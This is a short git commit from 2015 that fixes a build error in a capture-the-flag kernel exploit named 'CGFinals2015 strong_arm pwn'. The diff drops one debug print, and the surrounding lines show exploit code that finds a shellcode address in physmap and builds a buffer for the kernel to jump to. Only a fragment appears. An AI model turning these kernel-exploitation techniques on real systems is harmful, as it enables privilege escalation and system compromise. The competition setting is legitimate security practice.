Fix CGFinals2015 strong_arm pwn build error

This commit is contained in:
q3k 2015-04-08 11:39:42 +09:00
parent 6b6f816889
commit 25c955bf15

View file

@ -61,7 +61,6 @@ int main(int argc, char **argv)
// Calculate shellcode physical address
uint64_t phys_addr = translate(addr);
printf("[*] shellcode physmap addr %p\n",phys_addr);
printf("[*] global physmap addr %p\n",phys_asdf);
// Prepare pwn buffer - kernel will jump to third word
uint64_t *buffer = (uint64_t *)malloc(24);
buffer[0] = 0x4141414141414141;